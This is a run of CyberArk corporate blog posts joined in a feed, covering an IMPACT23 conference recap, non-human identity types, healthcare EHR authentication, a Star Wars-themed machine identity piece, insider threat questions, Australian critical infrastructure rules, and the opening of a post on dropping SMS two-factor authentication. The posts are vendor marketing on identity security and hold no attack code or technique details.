While intelligent privilege controls remain the critical foundation for securing access across organizations, today’s challenges have grown more complex thanks to three driving forces:

1.  New identities
2.  New environments
3.  New attack methods

With 84% of organizations experiencing an identity-related breach in the past year, the ability to build business resiliency depends on meeting these three challenges head-on. With this urgency top-of-mind, IMPACT speakers and panelists – including CyberArk customers and partners – explained how to meet those challenges, drawing from their firsthand experiences and diving into identity security trends.

From cutting-edge research on how generative AI can be used to create polymorphic malware to exciting announcements about how CyberArk is securing the most-used application of all – the browser – there were plenty of key insights and exciting real-world examples shared.

Now, with IMPACT just wrapped after a busy three days of energizing keynotes, panels and breakout sessions (plus all those nightly networking gatherings), the following are our initial reflections on some top highlights from the past few days.

New Identities

Distributed workforces, third-party users and the surge of machine identities have led to identity sprawl like we’ve never seen before. Today’s security leaders must protect hundreds of thousands of identities – human and machine – on a daily basis, from external contractors developing applications to robotic process automation bots performing formerly manual tasks.

All of these identities are key contributors to organizations’ cloud and digital initiatives. The trouble is, they often have far more access to sensitive resources than they need. It’s not just the IT admins of the world who need our protection – it’s every identity that comes into contact with an enterprise’s data, infrastructure and environments.

As identities proliferate, our industry must evolve to meet the challenge. CyberArk experts discussed ways security teams can ensure least privilege for every form of identity by leveraging automation, machine learning and controls typically reserved for privileged users, such as enterprise-grade password protection, session protection and just-in-time capabilities.

CyberArk also revealed some significant new innovations from the CyberArk Identity Security Platform that are helping to lead the charge – including automation and artificial intelligence.

New Environments

It’s not just the identities that are getting more complex to manage. As CyberArk CEO Matt Cohen said in his opening keynote, “No longer are we living in the walled garden of the on-prem data center.” In fact, in a recent CyberArk survey, respondents highlighted that they are already using three or more cloud service providers (CSPs).

CyberArk CEO Matt Cohen delivers his opening keynote.

It is not only the number of environments that poses a challenge for security teams, but also their sheer intricacy. In the cloud breakout sessions, our experts highlighted that there are four layers to consider when it comes to cloud security:

  • Securing high-risk access to third-party SaaS applications.
  • Securing access for lift-and-shift workloads running in virtual machines (VMs).
  • Securing access for workloads on cloud infrastructure (IaaS).
  • Securing access, controls and experience for CSP services in the cloud.

Our speakers also brought up the balancing act security teams must maintain when it comes to enabling innovation in these new environments. Many of the IMPACT sessions emphasized that security must meet developers where they are, creating a seamless experience that enables the devs to do what they do best while still securing the environments they work in. That means moving beyond simple standing access into more dynamic and ephemeral access policies such as just-in-time access and Zero Standing Privileges.

New Attack Methods

During Tuesday’s keynote session, CyberArk Founder and Executive Chairman Udi Mokady reminded the audience that companies aren’t the only ones innovating. Today’s attackers employ a business innovation mindset and are constantly upping their game. Intermittent encryption and a new attack group’s weaponization of Discord to spread malware were just two examples of the combination of business and attack innovation our CyberArk Labs team is seeing today.

CyberArk Founder and Executive Chairman Udi Mokady addresses attacker innovation and the threat landscape.

Software supply chain attacks also continue to be a hot topic of discussion. Multiple breakout sessions covered the importance of taking a holistic approach to securing CI/CD pipelines to combat new attacker innovations. Mokady also brought up the specter of what we’ve dubbed a “cascading software supply chain attack,” like what was seen in the 3CX attack, in which attackers gained a foothold in the popular VoIP desktop tool through a user who had been a victim of a software supply chain attack on the now-unmanaged trading platform X_Trader.

Lavi Lazarovitz, VP of Cyber Research and head of CyberArk Research Labs, showed attendees just how sophisticated attackers can get when using generative AI. After demonstrating a spooky deepfake of Mokady and how it could be used in a vishing attack – the voice version of phishing – Lazarovitz emphasized that the distance from creating these types of deepfakes to gaining access to sensitive information or credentials is short. He also touched on how biometric authentication could be hacked using generative AI, referencing chilling research from Tel Aviv University on creating a master key to unlock facial recognition protocols. Finally, he showcased how the CyberArk Labs team was able to use ChatGPT to generate code for a type of malware that attackers could use to harvest valuable credentials and sensitive information.

CyberArk Labs’ Lavi Lazarovitz discusses attacker innovation through generative AI.

We also got a glimpse into how attackers innovate and think from the firsthand experiences of Marcus Hutchins, who shared his story of how he made the journey from developing malware as a young hacker to halting the 2017 WannaCry attack. He delivered it from the unique perspective of a former malware author now fighting on the side of cybersecurity defenders. One of his biggest cautions looking at the threat landscape today had to do with how credentials are now often harvested by malware but not immediately used. Instead, they’re sold on again and again, meaning that it could be years before they’re used to break into the target organization.

CyberArk Labs’ Andy Thompson interviews Marcus Hutchins.

And that brings us to one of the biggest attack vectors of interest at IMPACT23: cookie or session hijacking. Using this method, attackers gain control of a user’s session and gather important information (like cookies) that can then be used to further penetrate the network. CircleCI and Linus Tech Tips are just two of the most recent breaches tied to session hijacking, but as our CyberArk Labs team has shown, cookies and session IDs can be stolen with ease and are highly valuable to attackers. Across the breakouts, IMPACT speakers illustrated the risks around current browser usage and how easily cookies can be stolen and used to gain access to critical systems. There is an obvious need for a secure browser that can protect cookies and data while still providing a seamless user experience.

New Innovations

As Mokady emphasized in his keynote, a foundational piece of CyberArk’s constitution is to “combat attacker innovation with innovation,” staying one step ahead of these cutting-edge attack methods. Throughout the breakout sessions and keynotes, our experts offered clear strategies on how to mitigate identity-based attacks with the help of CyberArk.

Though there were many new CyberArk capabilities revealed – which we touched on above – the marquee IMPACT23 announcement focused on the new CyberArk Secure Browser. Part of the CyberArk Identity Security Platform, the Chromium-based CyberArk Secure Browser supports enterprise Zero Trust initiatives with integrated security, centralized policy management and productivity tools while delivering a familiar user experience. By extending the CyberArk Identity Security Platform to the browser itself, CyberArk makes it easy for IT teams to tailor security, privacy and productivity controls on managed and unmanaged devices. CyberArk Secure Browser offers cookieless browsing to allow users to access and use web-based resources without exposing cookie files to attackers.

Thank you to all our customers and partners for being with us on this identity security journey, and welcome to those who have joined us this week at IMPACT23 as we continue to work together on all three fronts – because the future of security is identity.

]]>
The Seven Types of Non-human Identities to Secure https://www.cyberark.com/blog/the-seven-types-of-non-human-identities-to-secure/ Tue, 16 May 2023 13:40:47 +0000 https://www.cyberark.com/?p=144140

Non-humans are everywhere these days. Sure, you’ve seen the much-deserved hype about how AI-powered tools like ChatGPT are going to change everything. But there are plenty of more mundane non-human entities that you interact with in your daily life: the smart thermostat program that knows to cool down your house at a certain time every day, the application on your phone that suggests directions to a place you’ve searched for, and many others. Non-human identities pervade every aspect of our lives, both personally and professionally.

In fact, machine identities outweigh human identities by a factor of 45 to one, according to CyberArk research. Machine identities like bots in robotic process automation (RPA) workloads and microservices running in the cloud are growing at an exponential pace as more companies transform digitally. They’re automating many formerly mundane tasks and increasing many functions’ operational efficiency. These non-human identities rely on secrets (including passwords, SSH keys and API keys) to access critical resources and do their jobs. And those secrets need to be secured, just as privileged credentials for humans do.

There are likely several areas across your organization that house non-human identities using secrets that need to be managed and secured. Below, we walk through seven types of the most common non-human identities you may find in your organization and some security challenges for each type when it comes to secrets management. Understanding these challenges (and seeing how different they can be for each identity type) is the first step to building a cohesive plan on how to mitigate them.

1. Cloud Environments and Cloud-Native Apps

Many organizations use multiple cloud service providers (CSPs) to maintain pricing control, enable flexibility and avoid cloud vendor lock-in. Each CSP has its own method for storing, accessing and managing secrets. Additionally, cloud-native applications built on these platforms are continually updated using CI/CD processes and often use secrets to communicate with other microservices in the cloud environment in order to run. The main issue to address when it comes to the cloud is ensuring your security is as flexible and dynamic as the environment your developers are working in.

Security Challenges:

  • Developers need to be able to work dynamically and at scale.
  • Developers can take shortcuts (e.g., hard-coding secrets) or skip over security requirements.
  • Compliance roadblocks can be created from not meeting corporate security requirements.
  • Underlying DevOps tools and container platforms can lack security.
  • Code repositories can accidentally expose secrets and cloud access keys (see the AstraZeneca breach, where access to sensitive patient data was exposed through a credential on GitHub).

2. DevOps Tools, CI/CD Pipelines and the Software Supply Chain

DevOps tools typically require a high level of privileged access to perform their tasks. Thus, CI/CD pipelines and other DevOps tools are known as “Tier Zero” assets, meaning if an attacker gains access to these assets, they can then access more privileged credentials. The software development lifecycle moves fast, and the tools used within it can become a big vulnerability if your DevOps teams aren’t fully aware of necessary security measures.

Security Challenges:

  • Security has to shift left to be involved earlier in the development cycle.
  • DevOps admins and developers may choose to use built-in secrets management functions, contributing to secrets or vault sprawl.
  • Human checks and balances may need to be enforced.
  • An attacker may be able to escalate access once a tool is compromised (see the CircleCI breach).

3. Automation Tools and Scripts

Automation tools and scripts can be powerful and perform complex IT and other related tasks. But they can also be very simple, such as a basic PowerShell script used infrequently. While these simple scripts may not jump out as being a large vulnerability, these automation tools and scripts often require high levels of privileged access and have been responsible for some high-profile breaches in the past.

Security Challenges:

  • Too often, scripts embed hard-coded credentials and are then posted to repositories.
  • Scripts may be overlooked as a security vulnerability because of their simplicity.
  • Ease of replicating and infrequent use make scripts hard to track.
  • Some automation tools have built-in (native) secrets management capabilities that can lead to secrets sprawl and vault sprawl.
  • Attackers can still exploit high-value credentials even if the tool is basic (see the 2022 Uber breach).

4. COTS and ISV Applications

Commercial-off-the-shelf (COTS) and independent software vendor (ISV) applications both require a high level of privileged access to do their jobs. Because these apps aren’t owned by your company, they have some unique security needs that should be addressed, including ensuring that they are integrated with your security tools.

Security Challenges:

  • These apps require vendor-developed integrations.
  • They are vulnerable to weaknesses in the vendor’s software supply chain and CI/CD processes.
  • High levels of access mean there is a high level of exposure if they are compromised by an attacker.
  • Personal information stored in business applications could be exposed in a data breach.
  • Least privilege and just-in-time access are imperative to reduce risk.

5. Robotic Process Automation (RPA) Workloads

RPA bots help development and operations teams (and other “citizen developers”) automate many formerly mundane tasks, speeding up workflows. But manual credential rotations for these bots do not scale, especially when an organization is using a large number of unattended bots without a human supervisor. The biggest challenge for security teams is the need to ensure that they are enabling RPA velocity while also centrally managing policies to stay compliant and defend against attacks.

Security Challenges:

  • Manual rotation and management processes don’t scale.
  • Security can be seen as a blocker to deployment or operational efficiency requirements.
  • Security wants easy-to-use integrations to minimize security issues and speed up deployment.

6. N-Tier/Static Homegrown Applications

While many of the above applications harness newer digital innovations such as the cloud and automation, most organizations still depend on a variety of internally developed applications. These applications span a variety of traditional environments (such as Java) and operating systems, including Unix/Linux, and because they are hosted on-premises, they pose some challenges that differ from those of the other identity types.

Security Challenges:

  • Credentials are hard-coded or locally stored, introducing risk if compromised.
  • Automatic rotation is sometimes not possible for the credentials used by these apps.
  • Access rights need to be better tailored, as these apps can be over-permissioned.
  • They need to easily connect to other systems and applications.

7. Mainframe Applications

Like N-tier applications, applications hosted on mainframes (such as z/OS) are still widely used by enterprises for specific use cases. These are the most mission-critical applications an enterprise has, and it’s vital that these applications do not experience outages or have their processes interrupted by security procedures.

Security Challenges:

  • Credential rotation can potentially interrupt high-volume transactions.
  • Credentials are hard-coded or locally stored, introducing risk if compromised.
  • High levels of reliability are required.

So How Do You Keep Track of It All?

You can see how overwhelming secrets management can get when you’re working with a large number and variety of non-human identities. Each group has its own nuances and stakeholders that need to be considered when creating security policies. Being aware of all the different identity types in your organization and understanding all the different security needs that must be considered are the first steps to building a cohesive program to manage and secure these identities and the secrets they use.

That’s where centralizing secrets management can help. Our eBook “Key Considerations for Securing Different Types of Non-human Identities” walks you through best practices for securing secrets in each of these categories. It also provides a phased approach on how you can build a more effective secrets management program.

Kristen Bickerstaff is a senior content marketing manager at CyberArk.

]]>
Overcoming Healthcare EHR Access Hurdles https://www.cyberark.com/blog/overcoming-healthcare-ehr-access-hurdles/ Fri, 12 May 2023 14:25:27 +0000 https://www.cyberark.com/?p=144007

Healthcare cyberattacks are increasing in “frequency, severity and sophistication,” said Nitin Natarajan, U.S. Cybersecurity and Infrastructure Security Agency (CISA) deputy director, in his recent HIMSS23 Healthcare Cybersecurity Forum keynote. Attacks on hospitals have surged by 86% since 2021, with the average healthcare organization experiencing two or more ransomware attacks in the past year. “And this is going to continue to increase,” Natarajan warned.

Staying one step ahead of “well-funded” and “capable” adversaries requires vigilance and collaboration – as well as a close look at electronic health record systems (EHRs), the heart of modern healthcare IT. Because EHRs contain electronic medical records (EMRs) – essentially, digitized patient medical charts – EHRs are top targets for healthcare cyberattacks.

Healthcare Transformation, the Electronic Health Record Era and Rising Cybersecurity Risk

Many organizations adopted EHR systems as part of digital transformation pushes to curb inefficiencies and facilitate data sharing. According to HIPAA Journal, 57% of healthcare workers say their job has become more digitized over the past two years. While digitization improves many processes and experiences, it also tends to complicate IT systems. When system A won’t “talk” to system B, clinicians can waste valuable time piecing together patient medical history, medication allergies, comorbidities and more.

Transformation projects can also create security gaps, driving up risk and cybersecurity debt. Security professionals across industries overwhelmingly (79%) agree that security lags behind IT and digital initiative investments, according to the CyberArk 2022 Identity Security Threat Landscape Report. Meanwhile, a 2022 Ponemon Institute study revealed that 89% of healthcare organizations experienced a cyberattack in the past year, negatively impacting patient outcomes for 57% of surveyed organizations.

The same CyberArk report identified privilege escalation as the number one area of attack risk for healthcare organizations. By stealing credentials via phishing, social engineering or other techniques, threat actors can compromise or abuse identities, assess a healthcare IT environment and escalate privileges to reach their goal: stealing EMRs or holding them for ransom. According to the U.S. Department of Health and Human Services, protected health information (PHI) found within EMRs gives criminals more details than any other record, making healthcare data the most valuable on the dark web.

Simplifying EHR Authentication Workflows to Improve Healthcare Outcomes

On the flip side, for defenders, healthcare data confidentiality, integrity and availability are more important than ever. To achieve these goals, multi-factor authentication (MFA) is a crucial security layer.

Most healthcare organizations already have a two- or multi-factor authentication method in place due to regulatory compliance requirements. For example, U.S.-based clinicians must go through MFA before prescribing or approving prescriptions for opioids and other controlled substances. Yet not all MFA is created equal, and many organizations use insecure methods that put EHR systems and patient data at risk. A newly released HIMSS Cybersecurity Study reveals that 57.23% of healthcare organizations still use basic usernames and passwords and 58.49% use traditional SMS-based authentication (notorious for facilitating SIM-swapping attacks), while just 9.43% use phishing-resistant (or passwordless) MFA factors, such as FIDO, QR codes, biometrics or physical tokens.

HIMSS survey authors call for more robust authentication measures, writing, “Healthcare needs to adopt passwordless multi-factor authentication as too many compromises happen nowadays involving passwords with as many as 921 passwords compromised each second.”

Security isn’t the only factor in play. Usability is just as important for hard-working healthcare workers. Constantly re-authenticating into EHR systems to access patients’ EMRs, enter health information and complete prescriptions is not only time-consuming, it’s distracting. In fact, many clinicians report negative EHR-related experiences. According to a recent Annals of Family Medicine study, 79% of clinicians say they maintain less eye contact when using an EHR system, 53% say they listen less carefully and 62% say EHR use makes patient visits less personal. Back-to-back patient visits leave clinicians little time for follow-up, yet many can’t securely access patient records outside the hospital network or from outside devices.

Also of particular interest, the same study found that most patients view EHR systems positively (91%). This suggests that many EHR challenges could be solved by making clinicians’ lives easier — for instance, by giving clinicians access to everything they need within an EHR with single sign-on (SSO). U.S. Surgeon General Vivek Murthy agrees. In a recent advisory, he urged organizations to “optimize technology to increase time spent between health workers and patients.” He outlined specific examples such as “simplifying EHR-based workflows and addressing patient and health worker usability issues with virtual care.”

Healthcare professionals shoulder an enormous burden. Suffering from severe workforce shortages and burnout, they are leaving the industry in droves. The World Health Organization estimates a global shortfall of 10 million health workers by 2030. Lightening clinicians’ workloads in every way possible is imperative. Our health — and the future of our healthcare systems — depends on it.

Lee Godby is a director of business development at CyberArk.

]]>
Bad Droid! How Shoddy Machine Security Can Topple Empires https://www.cyberark.com/blog/bad-droid-how-shoddy-machine-security-can-topple-empires/ Thu, 04 May 2023 09:02:56 +0000 https://www.cyberark.com/?p=143578

The need for strong identity security protocols for humans has been a given for years. Your organization likely has multiple layers of controls to ensure that access to sensitive assets is limited to those that need it. But a certain large, global (well…multi-global) organization that comes to mind on this May the Fourth also had layers of human identity controls that adhered to the principles of least privilege.

And yet a small, scrappy group of attackers exploited their security protocols, exfiltrated their most sensitive data and destroyed the empire – er, organization – from within its own network. How did this happen?

Machine identity security is just as crucial, if not more so, to organizations defending against the rise of identity-based cyberattacks. After all, machine identities now outweigh human ones in your average organization by a factor of 45x, according to CyberArk research. So how do you make sure those are secure too? Let’s take a look at what happened to this fictitious organization – we’ll call them Empire Inc.

Human Identity Security Is All Well and Good…

Like many organizations, Empire Inc. had multiple layers of human identity security controls, some of which were built into their…employees’ uniforms.

The first were something that Empire Inc. called “code cylinders,” but you could think of them as similar to privileged account credentials. Some employees, those who required lower privileged access, only had one, while those higher up in the organization could have access to several. These credentials uniquely identified each user with their personal security code and clearance level, providing authentication. Each sector of the organization also required a different code cylinder, ensuring there was a separation of duties that prevented potential conflicts of interest or fraud by reducing the damage any one individual could do beyond their job scope. Finally, these credentials provided session monitoring and a detailed audit trail of each user’s activity, including real-time reporting of suspicious behavior and unnecessary access to sensitive files and resources.

Rank insignia plaques also signified each employee’s role, enabling Empire Inc. to provide granular access control and authorization based on the user’s role, known as role-based access controls (RBAC).

All of these security measures did a great job of enforcing the principle of least privilege when it came to the human employees of Empire Inc.

But You Can’t Forget Your Non-human Identities

Empire Inc. made one big mistake, however. While they had an iron-fisted grip on human identity and access control, they completely forgot about the machines that also had access to their environments and systems. And even when they did acknowledge their machine identities, they wrongly assumed that the droids couldn’t cause any real harm to such a large organization.

Early on in the attack – which spanned several months as the threat actors diligently worked their way through Empire Inc.’s layers of security – one machine gained highly privileged access and was allowed to exfiltrate the sensitive data it had stolen and pass it along to its human allies. The security controls spotted the exfiltration but shockingly let the machine – we’ll call him “ArrToo” – go, as they didn’t detect any “lifeforms” involved. By not applying the same strict controls it had for human employees when it came to granting access and auditing user activity, Empire Inc. left a giant hole in its security defense.

From there, the attackers continued to exploit Empire Inc.’s ignorance of the power machine identities could wield. Because of Empire Inc.’s lack of proper authentication protocols for machine identities (which they had for humans), ArrToo was able to gain access to every environment within the organization, as well as all of the resources within it, without an authorization check catching him. Locks were meaningless to ArrToo, who bypassed them with ease and exfiltrated additional data from Empire Inc. Eventually, ArrToo’s activities, unmonitored by the security team at Empire Inc., allowed its human allies to launch a successful attack against Empire Inc. and bring down their entire network.

Zero Trust: Adopt an “Assume Breach” Mindset

Let’s try and give Empire Inc. the benefit of the doubt. Perhaps they knew a rogue machine like ArrToo would be able to bypass many of their security controls, which is why they refused to allow machines access to many places in their organization. Their focus was mainly on keeping threat actors from breaching their perimeter. The problem with this approach, however, is that it allowed the attackers to turn a small breach into a much larger disaster.


Instead, faced with constant cybersecurity threats, enterprises need to focus on what they can control to mitigate their risk and potential exposure. Because there is no longer a well-defined IT perimeter, the threat landscape is now asymmetric, making a Zero Trust security mindset essential. Protecting non-human identities and the secrets that they have access to — which can grant them high levels of privileged access to multiple sensitive resources — is critical to defending against the next attack. Organizations need to assume that they’ve already been breached and build layers of security to ensure both human and non-human identities have the right amount of access.

Security teams need to holistically manage access across the entire enterprise without silos or blind spots, with the ability to automatically rotate credentials as needed. A centralized secrets management system is the best option for authenticating, authorizing and auditing non-human access because it allows organizations to fully understand who has access to what and to automatically rotate or revoke access as needed.

To learn more about how secrets management can help secure non-human identities (and for some more fun discussion on Empire Inc. and the scrappy attackers that brought them down), join me for our webinar, “Are These The Droids You’re Looking For – Bringing Balance to Application Identities.”

And May the Fourth be with you!

John Walsh is a senior product marketing manager at CyberArk.

]]>
Assess Insider Threats by Asking 6 Key Questions https://www.cyberark.com/blog/assess-insider-threats-by-asking-6-key-questions/ Mon, 01 May 2023 15:37:24 +0000 https://www.cyberark.com/?p=143479

The people closest to your business can sometimes cause the most damage. Yet while top-secret data leaks are headline news today, most insider threats are well-intentioned people who just screw up.

Humans: The Weakest Cybersecurity Link

The number of identities with access to sensitive data in your organization keeps growing, and increasingly, threat actors can count on two things. First, that someone with sensitive access will do something they shouldn’t, such as a business user who accidentally clicks on a link in a phishing email, a third-party contractor who falls for an MFA fatigue attack, a developer who hard codes credentials to save time or an IT admin who exposes troves of sensitive information after misconfiguring a cloud account. And second, that their victim’s organization isn’t equipped to stop or fix every snafu, every time.

According to Gartner®, Inc. estimates, lack of talent or human failure will be responsible for over half of significant cyber incidents by 2025. [1]

To Address Insider Identity Risks, Ask These Six Questions

As your organization looks inward, our CyberArk team recommends asking these six questions to help assess insider risks and ways to manage them better.

  • What assets matter most, and where do they live? As your IT infrastructure grows more extensive and complex, users work from everywhere, storing and accessing data in web applications, internal files, databases and services hosted on-premises and in the public cloud. You can’t effectively isolate and stop threats from reaching your company’s “crown jewels” without a clear understanding of what you need to protect and where these assets are stored.
  • Can we see how users are handling sensitive data? Based on CyberArk research, about 52% of the workforce identities in your company can access sensitive data. Yet like 48% of organizations today, you may have limited resources, visibility and control over how users are handling valuable and confidential assets. A consistent way to record, audit and protect end-user activity – particularly in web app and privileged sessions – is critical to quickly uncovering and mitigating insider threats.
  • Are we analyzing behavior to make more intelligent access decisions? According to Gartner, “A focused insider risk management program should proactively and predictively identify behaviors that may result in the potential exfiltration of corporate assets or other damaging actions and provide corrective guidance, not punishment.” [2] Many security and compliance teams use AI to help contextualize user behavior data (for example, login date/time, device, location and privileged account use) and establish baselines for users across their access to web apps, resources and privileged accounts. This practice makes it easier to detect risky behavior and gauge the likelihood of identity compromise, while enabling workers to operate without unnecessary disruption.
  • Are there ways we can improve the insider experience? University College London research suggests that the amount of effort required to do something influences what we think we see. In other words, people are likely to perceive challenging tasks – like repeated authentication prompts to access resources they regularly use – to be less appealing. And when the going gets tough, people take shortcuts and drive up insider risks. For some, this means storing files in Dropbox, sending information via personal email, sharing passwords or installing rogue applications – actions that may seem harmless, but can unintentionally put data and systems at risk. A 2022 Gartner survey found that 69% of employees have bypassed their organization’s cybersecurity guidance in the past 12 months, while 74% said they would be willing to bypass cybersecurity guidance if it helped them or their team achieve a business objective. [3]

    In CyberArk’s view, effective Identity Security anticipates and removes barriers, making it easy for people to do the right thing.

  • How do we bridge the cybersecurity expectation-reality gap? Overall awareness is up, and most people recognize that cybersecurity is everyone’s job, which is great and true. But that isn’t a defensible defense. Even if just 2.9% of employees click on phishing links (as the latest Verizon DBIR found), attackers still have plenty of opportunities to steal credentials and compromise identities. A Zero Trust philosophy assumes that humans will make mistakes. Instead of expecting that to change, it accounts for errors and how to minimize damage by promoting continuous authentication and authorization for all identities – human and machine – along with secure, least privilege access that’s granted just in time.
  • Are we tackling identity-based threats holistically? Organizations often use separate products to manage access for workforce and privileged identities, which require separate user and resource management and identity-related risk assessment. But without unified threat detection, a centralized source of data and standardized risk analysis and remediation policies, teams are more likely to miss, mishandle or respond too slowly to threats from both inside and outside.

You’ll need to gain stakeholder support to formalize insider threat protection as part of a broader Identity Security program. Convincing IT admins and other highly privileged users – who may initially resist scrutiny or change – is crucial. Another critical group to win over is leadership. Referencing current insider threat headlines can help frame the issue and drive a sense of urgency, while meaningful metrics are a must.

Because insider threats could be you, me or anyone else linked to an organization, intelligent privilege controls that were once designed for the most privileged user must now extend to every identity – enhancing visibility, detection and response, while maintaining the critical balance between security and usability.

1, 2, 3 – Gartner Press Release, “Gartner Predicts Nearly Half of Cybersecurity Leaders Will Change Jobs by 2025,” February 22, 2023. https://www.gartner.com/en/newsroom/press-releases/2023-02-22-gartner-predicts-nearly-half-of-cybersecurity-leaders-will-change-jobs-by-2025

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Australia’s Growing Focus on Critical Infrastructure Cybersecurity in 2023 https://www.cyberark.com/blog/australias-growing-focus-on-critical-infrastructure-cybersecurity/ Wed, 26 Apr 2023 12:47:21 +0000 https://www.cyberark.com/?p=132143

In recent years, several major cyberattacks targeted critical infrastructure in Australia, including a major telecommunication company, which suffered a devastating data breach in September 2022. Soon after this cyberattack, Australia’s biggest health insurer also faced a ransomware attack in October 2022 that caused systems to go down. Customers could not access services through the company’s website or app.

These cyberattacks severely disrupted these organizations’ operational rhythms and required extra resources to manage the fallout.

They also occurred on a global stage featuring rising geopolitical tensions and increased interconnectivity of individual countries’ critical infrastructures. Escalating threats and cyberattacks on critical infrastructure are now more than ever a collective, global issue.

In the wake of last year’s major breaches, the Australian government is pursuing a new cybersecurity agenda. While these were far from the first attacks on Australia’s critical infrastructure systems, they emphasized the growing threat. Governments worldwide sprang into action to strengthen critical infrastructure resilience and information sharing – with Australia notably taking several significant steps designed to fortify its own critical infrastructure.

Australia’s Steps to Strengthen Critical Infrastructure

In response to the major security breaches that unfolded in 2022, the Australian government has pushed for critical infrastructure reforms in 2023. As part of this effort, Australia’s Home Affairs Minister Clare O’Neil stated the government will set up a new national office for cybersecurity within Home Affairs and begin consulting on a new seven-year cybersecurity strategy.

One of the recent outputs of Australia’s concerted effort to fortify its critical infrastructure is its 2023 Critical Infrastructure Resilience Strategy (the Strategy), which defines critical infrastructure (CI) as, “… those physical facilities, supply chains, information technologies and communication networks, which impact the social or economic well-being of the nation or affect Australia’s ability to conduct national defense and ensure national security.” This definition expands the scope of previously established critical infrastructure sectors.


Australia’s critical infrastructure now consists of 11 defined sectors:

  • Communications
  • Financial services and markets
  • Data storage or processing
  • Defense industry
  • Higher education and research
  • Energy
  • Food and grocery
  • Healthcare and medical
  • Space technology
  • Transport
  • Water and sewerage

The scope of what’s officially considered to be critical infrastructure varies from country to country. Examples of the most critical assets to protect, however, typically include data assets, such as healthcare medical records or defense department classified materials, along with physical assets, such as energy control systems and water treatment facilities. All critical sectors rely on computerized operational technology (OT) to function. OT is converging with IT, which exposes industrial control system (ICS) endpoints and other assets to aggressive threats such as ransomware.

Australia’s Security of Critical Infrastructure Act 2018 (SOCI Act) creates a framework for the regulation and protection of critical infrastructure sectors. As part of Australia’s Cyber Security Strategy 2020, the Australian government updated the SOCI Act and introduced critical infrastructure law reforms with the aim to further protect and improve the resilience of the country’s critical infrastructure. More than 18 months after its original announcement, the full package of reforms to the SOCI Act has been implemented with important implications for critical infrastructure sectors in Australia.

Australia is one of many governments and industry regulators around the world that have recently enacted cybersecurity mandates and guidelines to protect critical infrastructure. The updated SOCI Act took effect on Feb. 17, 2023. It requires responsible entities to adopt a critical infrastructure risk management program (CIRMP) by Aug. 17, 2023, and to comply with ISO 27001 or an equivalent standard, such as a NIST framework, by Aug. 18, 2024.

Here is a closer look at the key cybersecurity implementations that the Australian critical infrastructure community will be making in 2023:

  1. Strengthening the government’s own cybersecurity by modernizing the systems and technologies used to protect sensitive data and networks, and increasing the number of trained cybersecurity professionals within government.
  2. Implementing new regulations and standards that require businesses to improve their cybersecurity posture, protect their data and reduce the risk of cyberattacks.
  3. Developing national cybersecurity coordination to foster clear communication and cooperation between agencies, which is vital in a fast-moving threat environment.
  4. Improving the cybersecurity of critical infrastructure by working with the businesses and organizations that operate systems such as power grids and transportation networks to ensure they are properly secured. This is a central focus of 2023.
  5. Cooperating internationally on cybersecurity challenges by building strong partnerships with other countries.
  6. Placing greater focus on cybersecurity literacy and training.

Australia’s Expanding Attack Surface

Australia’s efforts come at a critical moment. According to the Australian Cyber Security Centre (ACSC), many of the cyber incidents reported between July 2021 and June 2022 were associated with Australia’s critical infrastructure or essential services. In the 2021–22 financial year, 95 cyber incidents (approximately 8% of all cyber incidents the ACSC responded to) affected critical infrastructure. Since the implementation of amendments to the SOCI Act in April 2022, the ACSC has notified multiple critical infrastructure entities of cyber incidents and vulnerabilities on their networks.

At the same time, a confluence of technology trends continues to expand the threat landscape, opening new avenues for critical infrastructure attackers to steal information, disrupt systems and, increasingly, threaten human safety:

IT/OT network convergence. To reduce expenses, simplify operations and support industrial internet of things (IIoT) initiatives, many IT and OT networks are converging. However, this eliminates the “air gap” that once separated these two environments, providing a pathway for external threat actors to gain access to industrial control systems.

Push to standards-based OT. Industrial control systems were once based on proprietary hardware and special-purpose software. In the current shift toward standards-based OT, many systems run on Linux-based commodity servers and leverage commercial-off-the-shelf (COTS) software, making them vulnerable to software supply chain attacks.

Widespread cloud adoption. Critical infrastructure operators are adopting Software as a Service (SaaS), Infrastructure as a Service (IaaS) and Platform as a Service (PaaS) solutions to accelerate the pace of innovation, streamline operations and support IoT programs like Smart Grid, Smart City and Smart Transportation systems. While essential to digital transformation, these cloud services also provide new ways for adversaries to penetrate systems.

Critical Infrastructure Cybersecurity Regulations

Governments and industry regulators have already enacted cybersecurity mandates and guidelines to protect critical infrastructure against cyberattacks.

Identity Security is an essential requirement for most of these regulations. Identity Security helps critical infrastructure operators defend against cyberattacks, drives operational efficiencies, satisfies regulatory requirements and provides evidence of compliance. To fulfill these requirements, critical infrastructure operators might need to:

  • Implement foundational controls to safeguard privileged access.
  • Monitor privileged access activity and promptly notify authorities of a security breach.
  • Demonstrate evidence of compliance to auditors on a regular basis.

Prioritizing Identity Security to Help Fortify Critical Infrastructure

Cybersecurity mandates and guidelines to protect critical infrastructure are becoming increasingly widespread. Many of these are grounded in a Zero Trust model, which assumes that all digital identities, human or machine, are untrusted by default and must be authenticated and authorized regardless of their network or location.

Unlike a traditional perimeter-based security model, a Zero Trust architecture centers on identity. Backed by a comprehensive Identity Security solution and strategy, it:

  • Protects cloud-based IT and OT systems as well as on-premises IT and OT systems.
  • Defends against insider threats as well as external threats.
  • Provides inherent security for remote workers and mobile users.

Identity Security offers a robust set of unified access controls to enable Zero Trust. Given the transformational characteristics of critical infrastructure, Identity Security is the modern security paradigm shift that helps to protect it efficiently and effectively.

In establishing an Identity Security approach, critical infrastructure operators can apply more stringent controls by tracking identities and enabling security controls to be seamlessly applied, based on risk in real time.

If you’re looking for tips on assessing your organization’s current strategy and tackling identity-related risk, check out the CyberArk Blueprint for Identity Security Success, a vendor-agnostic framework for defining a roadmap for Identity Security success.

Thomas Fikentscher is CyberArk’s Regional Director for Australia and New Zealand.

Why Shutting Off SMS 2FA Makes Sense https://www.cyberark.com/blog/why-shutting-off-sms-2fa-makes-sense/ Fri, 21 Apr 2023 16:12:53 +0000 https://www.cyberark.com/?p=143026

Twitter’s recent decision to turn off SMS two-factor authentication (2FA) for non-Twitter Blue users created a stir. While media and tech pundits questioned the company’s motives, many users complained of losing a universal security measure behind a paywall. But all reasons and transition hiccups aside, “the residual benefit here is that it provides an opportunity to improve the security of Twitter’s userbase by migrating them to a more secure method of multi-factor authentication (MFA),” says CyberArk Labs offensive cybersecurity research evangelist Andy Thompson.

